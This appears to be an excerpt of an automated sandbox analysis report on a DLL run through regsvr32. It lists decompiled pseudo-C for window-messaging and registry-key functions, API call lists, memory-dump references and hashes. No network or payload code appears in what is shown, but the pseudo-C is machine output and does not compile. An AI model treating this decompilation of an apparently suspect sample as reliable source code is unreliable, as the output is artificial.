                                                                                                            0x1000a5a1
                                                                                                            0x1000a5b5
                                                                                                            0x00000000
                                                                                                            0x1000a5b7
                                                                                                            0x00000000
                                                                                                            0x1000a5b7
                                                                                                            0x1000a5b5
                                                                                                            0x1000a589
                                                                                                            0x1000a5b9
                                                                                                            0x1000a5ba
                                                                                                            0x00000000
                                                                                                            0x1000a5bf
                                                                                                            0x1000a4e5
                                                                                                            0x1000a4e7
                                                                                                            0x1000a4eb
                                                                                                            0x1000a4ed
                                                                                                            0x1000a4f5
                                                                                                            0x1000a4f7
                                                                                                            0x1000a4f7
                                                                                                            0x1000a4f7
                                                                                                            0x1000a4f9
                                                                                                            0x1000a4fe
                                                                                                            0x1000a500
                                                                                                            0x1000a504
                                                                                                            0x1000a506
                                                                                                            0x1000a50a
                                                                                                            0x1000a519
                                                                                                            0x1000a519
                                                                                                            0x1000a50a
                                                                                                            0x1000a504
                                                                                                            0x1000a51f
                                                                                                            0x1000a524
                                                                                                            0x1000a541
                                                                                                            0x1000a541
                                                                                                            0x00000000
                                                                                                            0x1000a526
                                                                                                            0x1000a533
                                                                                                            0x1000a539
                                                                                                            0x1000a53d
                                                                                                            0x1000a53f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000a53f
                                                                                                            0x1000a524
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetParent.USER32(00000004), ref: 1000A4B4
                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000A4DB
                                                                                                            • UpdateWindow.USER32(00000004), ref: 1000A4F5
                                                                                                            • SendMessageA.USER32(?,00000121,00000000,00000004), ref: 1000A519
                                                                                                            • SendMessageA.USER32(00000004,0000036A,00000000,00000004), ref: 1000A533
                                                                                                            • UpdateWindow.USER32(00000004), ref: 1000A579
                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000A5AD
                                                                                                              • Part of subcall function 1000EEC4: GetWindowLongA.USER32 ref: 1000EECF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                            • String ID:
                                                                                                            • API String ID: 2853195852-0
                                                                                                            • Opcode ID: 81312818f5d17bdaee03eade2c04d216c59580afc644ccd1aa9e932482451fe0
                                                                                                            • Instruction ID: db41b359fa61aebdb5d40a64e0a657e9155f7da8113a89a494e7da7d34e0904b
                                                                                                            • Opcode Fuzzy Hash: 81312818f5d17bdaee03eade2c04d216c59580afc644ccd1aa9e932482451fe0
                                                                                                            • Instruction Fuzzy Hash: A3417E30604B829FF711CF258C88A1BBAF5FFCABD5F104A2DF5819606AD761D984CA52
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000634E Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 79%
                                                                                                            			E1000634E(int __ebx, long __ecx, struct HWND__* __edi) {
				long _v4;
				char _v28;
				intOrPtr _v40;
				void* __esi;
				void* __ebp;
				long _t20;
				long _t21;
				struct HWND__* _t22;
				long _t23;
				struct HWND__* _t24;
				long _t25;
				struct HWND__* _t26;
				void* _t33;
				void* _t35;
				long _t39;
				long _t41;
				intOrPtr _t43;
				struct HWND__* _t47;
				struct HWND__* _t49;
				long _t51;
				long _t53;

				_t46 = __edi;
				_t39 = __ecx;
				_t37 = __ebx;
				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
					_t51 = E10005CAE();
					__eflags = _t51;
					if(_t51 != 0) {
						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
						__eflags = _t20;
						_t41 = _t51;
						_pop(_t52);
						if(_t20 != 0) {
							_t53 = _t41;
							_t21 =  *(_t53 + 0x64);
							__eflags = _t21;
							if(_t21 == 0) {
								_pop(_t52);
								goto L12;
							} else {
								__eflags = _t21 - 0x3f107;
								if(__eflags != 0) {
									_t35 = E1000EC09(__ebx, __edi, _t53, __eflags);
									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
								}
								return _t21;
							}
						} else {
							L12:
							_push(_t41);
							_push(_t37);
							_push(0);
							_push(_t52);
							_push(_t46);
							_v4 = _t41;
							_t22 = GetCapture();
							_t51 = SendMessageA;
							_t37 = 0x365;
							while(1) {
								_t47 = _t22;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t23 = SendMessageA(_t47, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									L27:
									return _t23;
								} else {
									_t22 = E1000BB9A(_t41, _t47, __eflags, _t47);
									continue;
								}
								goto L33;
							}
							_t24 = GetFocus();
							while(1) {
								_t46 = _t24;
								__eflags = _t46;
								if(_t46 == 0) {
									break;
								}
								_t23 = SendMessageA(_t46, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									goto L27;
								} else {
									_t24 = E1000BB9A(_t41, _t46, __eflags, _t46);
									continue;
								}
								goto L33;
							}
							_t39 = _v4;
							_t25 = E1000BBDF(_t37, _t39, _t46);
							__eflags = _t25;
							if(_t25 != 0) {
								_t26 = GetLastActivePopup( *(_t25 + 0x20));
								while(1) {
									_t49 = _t26;
									__eflags = _t49;
									_push(0);
									if(_t49 == 0) {
										break;
									}
									_t23 = SendMessageA(_t49, _t37, 0, ??);
									__eflags = _t23;
									if(__eflags == 0) {
										_t26 = E1000BB9A(_t39, _t49, __eflags, _t49);
										continue;
									}
									goto L27;
								}
								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L27;
							} else {
								goto L1;
							}
						}
					} else {
						L1:
						_push(0);
						_push(_t39);
						_v28 = 0x10044410;
						E100209E8( &_v28, 0x1003e2dc);
						asm("int3");
						_push(4);
						E1001FBC4(E10032E9B, _t37, _t46, _t51);
						_t43 = E100105C8(0x104);
						_v40 = _t43;
						_t33 = 0;
						_v28 = 0;
						if(_t43 != 0) {
							_t33 = E1000E58E(_t43);
						}
						return E1001FC9C(_t33);
					}
				} else {
					__eflags = __eax - 0x3f107;
					if(__eax != 0x3f107) {
						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
					}
					return __eax;
				}
				L33:
			}
























                                                                                                            0x1000634e
                                                                                                            0x1000634e
                                                                                                            0x1000634e
                                                                                                            0x10006353
                                                                                                            0x1000636e
                                                                                                            0x10006370
                                                                                                            0x10006372
                                                                                                            0x1000637d
                                                                                                            0x10006383
                                                                                                            0x10006385
                                                                                                            0x10006387
                                                                                                            0x10006388
                                                                                                            0x1001132f
                                                                                                            0x10011331
                                                                                                            0x10011334
                                                                                                            0x10011336
                                                                                                            0x10011358
                                                                                                            0x00000000
                                                                                                            0x10011338
                                                                                                            0x10011338
                                                                                                            0x1001133d
                                                                                                            0x1001133f
                                                                                                            0x10011350
                                                                                                            0x10011350
                                                                                                            0x10011357
                                                                                                            0x10011357
                                                                                                            0x1000638a
                                                                                                            0x10011290
                                                                                                            0x10011290
                                                                                                            0x10011291
                                                                                                            0x10011292
                                                                                                            0x10011293
                                                                                                            0x10011294
                                                                                                            0x10011295
                                                                                                            0x10011299
                                                                                                            0x1001129f
                                                                                                            0x100112a5
                                                                                                            0x100112be
                                                                                                            0x100112be
                                                                                                            0x100112c0
                                                                                                            0x100112c2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100112b2
                                                                                                            0x100112b4
                                                                                                            0x100112b6
                                                                                                            0x10011328
                                                                                                            0x1001132d
                                                                                                            0x100112b8
                                                                                                            0x100112b9
                                                                                                            0x00000000
                                                                                                            0x100112b9
                                                                                                            0x00000000
                                                                                                            0x100112b6
                                                                                                            0x100112c4
                                                                                                            0x100112dc
                                                                                                            0x100112dc
                                                                                                            0x100112de
                                                                                                            0x100112e0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100112d0
                                                                                                            0x100112d2
                                                                                                            0x100112d4
                                                                                                            0x00000000
                                                                                                            0x100112d6
                                                                                                            0x100112d7
                                                                                                            0x00000000
                                                                                                            0x100112d7
                                                                                                            0x00000000
                                                                                                            0x100112d4
                                                                                                            0x100112e2
                                                                                                            0x100112e6
                                                                                                            0x100112eb
                                                                                                            0x100112ed
                                                                                                            0x100112f7
                                                                                                            0x1001130e
                                                                                                            0x1001130e
                                                                                                            0x10011310
                                                                                                            0x10011312
                                                                                                            0x10011313
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10011302
                                                                                                            0x10011304
                                                                                                            0x10011306
                                                                                                            0x10011309
                                                                                                            0x00000000
                                                                                                            0x10011309
                                                                                                            0x00000000
                                                                                                            0x10011306
                                                                                                            0x10011326
                                                                                                            0x00000000
                                                                                                            0x100112ef
                                                                                                            0x00000000
                                                                                                            0x100112ef
                                                                                                            0x100112ed
                                                                                                            0x10006374
                                                                                                            0x10004e6e
                                                                                                            0x10004e6e
                                                                                                            0x10004e71
                                                                                                            0x10004e7b
                                                                                                            0x10004e82
                                                                                                            0x10004e87
                                                                                                            0x10004e88
                                                                                                            0x10004e8f
                                                                                                            0x10004e9e
                                                                                                            0x10004ea0
                                                                                                            0x10004ea3
                                                                                                            0x10004ea7
                                                                                                            0x10004eaa
                                                                                                            0x10004eac
                                                                                                            0x10004eac
                                                                                                            0x10004eb6
                                                                                                            0x10004eb6
                                                                                                            0x10006355
                                                                                                            0x10006355
                                                                                                            0x1000635a
                                                                                                            0x00000000
                                                                                                            0x10006361
                                                                                                            0x10006367
                                                                                                            0x10006367
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCapture.USER32 ref: 10011299
                                                                                                            • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 100112B2
                                                                                                            • GetFocus.USER32(?,?,?,?,00000000), ref: 100112C4
                                                                                                            • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 100112D0
                                                                                                            • GetLastActivePopup.USER32(?), ref: 100112F7
                                                                                                            • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 10011302
                                                                                                            • SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 10011326
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                            • String ID:
                                                                                                            • API String ID: 3219385341-0
                                                                                                            • Opcode ID: 716a47092e3f78f770cd422c122928cf665f7e490dacdeb6f448e5856ba979fe
                                                                                                            • Instruction ID: 5a63e8befbd248d730497780d713f82145d505fb4d7f97fa76e00961cd780979
                                                                                                            • Opcode Fuzzy Hash: 716a47092e3f78f770cd422c122928cf665f7e490dacdeb6f448e5856ba979fe
                                                                                                            • Instruction Fuzzy Hash: BB31057170032AAFE715EB24CC84EAF7BEEEB896C4B224579F400CB159CB31DC4196A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000AA1E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1000AA1E(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E100069D9();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E1000EC3C(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E10020F40(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E1000A84C(_t61, _t72, GetWindowLongA, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E1000A96A(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}



















                                                                                                            0x1000aa27
                                                                                                            0x1000aa2e
                                                                                                            0x1000aa34
                                                                                                            0x1000aa39
                                                                                                            0x1000aa5e
                                                                                                            0x1000aa5e
                                                                                                            0x1000aa64
                                                                                                            0x1000aa66
                                                                                                            0x1000aa66
                                                                                                            0x1000aa64
                                                                                                            0x1000aa69
                                                                                                            0x1000aa6e
                                                                                                            0x1000aa72
                                                                                                            0x1000aa75
                                                                                                            0x1000aa75
                                                                                                            0x1000aa78
                                                                                                            0x1000aa80
                                                                                                            0x1000aa85
                                                                                                            0x1000aa85
                                                                                                            0x1000aa88
                                                                                                            0x1000aa8c
                                                                                                            0x1000aa8f
                                                                                                            0x1000aa96
                                                                                                            0x1000aa9b
                                                                                                            0x1000aa9d
                                                                                                            0x1000aaa1
                                                                                                            0x1000aaab
                                                                                                            0x1000aab0
                                                                                                            0x1000aab6
                                                                                                            0x1000aab9
                                                                                                            0x1000aaca
                                                                                                            0x1000aad1
                                                                                                            0x1000aad4
                                                                                                            0x1000aad4
                                                                                                            0x1000aaa1
                                                                                                            0x1000aa9b
                                                                                                            0x1000aaea
                                                                                                            0x1000aaec
                                                                                                            0x1000aafb
                                                                                                            0x1000ab07
                                                                                                            0x1000ab0b
                                                                                                            0x1000ab13
                                                                                                            0x1000ab13
                                                                                                            0x1000ab0b
                                                                                                            0x1000ab1b
                                                                                                            0x1000ab2e

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongWindow$MessageSend_memset
                                                                                                            • String ID: (
                                                                                                            • API String ID: 2997958587-3887548279
                                                                                                            • Opcode ID: aa78740c6e25898a6f82f823b27cbc877ecf132d64a7ebce3814048f63547ad2
                                                                                                            • Instruction ID: a20b66fbb02a5be130650eb81bbfdf56ba9fafbfecf6f606b31a3a4f2e66e107
                                                                                                            • Opcode Fuzzy Hash: aa78740c6e25898a6f82f823b27cbc877ecf132d64a7ebce3814048f63547ad2
                                                                                                            • Instruction Fuzzy Hash: 7B31A1357007119FEB10DFB8C994A5EB7E8FF4A290F11062DE542A7A96DB31E840CB55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001A96C Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 79%
                                                                                                            			E1001A96C(void* __ebx, void* __ecx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t39 = __ecx;
				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E1000A8F0(_t36, _t39, _t45, GetTopWindow( *(_t45 + 0x20)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x20), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x20)) != 0) {
							if((_t37 & 0x00000002) == 0) {
								L16:
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							}
							_t39 = _t42;
							if(E1000EFB3(_t42) != 0) {
								goto L16;
							}
							goto L12;
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E1001A96C(_t37, _t39);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E1000A8F0(__ebx, _t39, _t44, GetWindow( *(_t41 + 0x20), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E1001A917(_t45, E1000A8F0(_t36, _t39, _t45, GetParent( *(_t41 + 0x20))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E1000A8F0(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
						continue;
					}
				}
				_t42 = E1000A8F0(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
				goto L7;
			}












                                                                                                            0x1001a96c
                                                                                                            0x1001a96c
                                                                                                            0x1001a96e
                                                                                                            0x1001a975
                                                                                                            0x1001aa15
                                                                                                            0x1001aa19
                                                                                                            0x1001aa28
                                                                                                            0x1001aa2c
                                                                                                            0x1001a9d7
                                                                                                            0x1001a9e7
                                                                                                            0x1001aa3e
                                                                                                            0x00000000
                                                                                                            0x1001aa3e
                                                                                                            0x1001a9e9
                                                                                                            0x1001a9ea
                                                                                                            0x1001a9f1
                                                                                                            0x1001aa03
                                                                                                            0x1001aa32
                                                                                                            0x1001aa32
                                                                                                            0x1001aa33
                                                                                                            0x1001aa35
                                                                                                            0x00000000
                                                                                                            0x1001aa35
                                                                                                            0x1001aa05
                                                                                                            0x1001aa0e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001aa10
                                                                                                            0x1001aa10
                                                                                                            0x1001aa10
                                                                                                            0x1001aa11
                                                                                                            0x1001aa12
                                                                                                            0x1001aa36
                                                                                                            0x1001aa3b
                                                                                                            0x00000000
                                                                                                            0x1001aa3d
                                                                                                            0x1001a9f1
                                                                                                            0x00000000
                                                                                                            0x1001aa2e
                                                                                                            0x1001a98a
                                                                                                            0x1001a98f
                                                                                                            0x1001a9c3
                                                                                                            0x1001a9ab
                                                                                                            0x1001a9af
                                                                                                            0x00000000
                                                                                                            0x1001a9b5
                                                                                                            0x1001a9be
                                                                                                            0x00000000
                                                                                                            0x1001a9be
                                                                                                            0x1001a9af
                                                                                                            0x1001a9d5
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$LongParentVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 506644340-0
                                                                                                            • Opcode ID: 88551c36cc544e916e0c72ef4a85d69b0a9d81e295017d87dfa12ef8939d57f5
                                                                                                            • Instruction ID: afcf25548e9ffcd49ee0c38f979e935dd92c7862c2c1ebd23c82871fc7a90cd9
                                                                                                            • Opcode Fuzzy Hash: 88551c36cc544e916e0c72ef4a85d69b0a9d81e295017d87dfa12ef8939d57f5
                                                                                                            • Instruction Fuzzy Hash: 0121B232A407516FD621DA758D05F1B76ECFF4A690F424524F981AF152EB30ECC0C761
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10010EA7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10010EA7(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}









                                                                                                            0x10010ec2
                                                                                                            0x10010ec9
                                                                                                            0x10010ecc
                                                                                                            0x10010ecf
                                                                                                            0x10010ed2
                                                                                                            0x10010edd
                                                                                                            0x10010f14
                                                                                                            0x10010f14
                                                                                                            0x10010f1f
                                                                                                            0x10010f24
                                                                                                            0x10010f24
                                                                                                            0x10010f29
                                                                                                            0x10010f2e
                                                                                                            0x10010f2e
                                                                                                            0x10010f37

                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10010ED5
                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10010EF8
                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10010F14
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10010F24
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10010F2E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreate$Open
                                                                                                            • String ID: software
                                                                                                            • API String ID: 1740278721-2010147023
                                                                                                            • Opcode ID: e64cde27f10a0a0aba8dc504e002967937950267acbfc865cd82a8aca435e45d
                                                                                                            • Instruction ID: 6908282d98887baf5b1b11d67664c0e969dcc26382147783454bf2a56fb15221
                                                                                                            • Opcode Fuzzy Hash: e64cde27f10a0a0aba8dc504e002967937950267acbfc865cd82a8aca435e45d
                                                                                                            • Instruction Fuzzy Hash: DF11E376D00159FBDB21DB9ACD89CDFFFBCEF89750B1040AAB600A6122D2709A41DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100021CE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100021FF
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002222
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002238
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000225F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
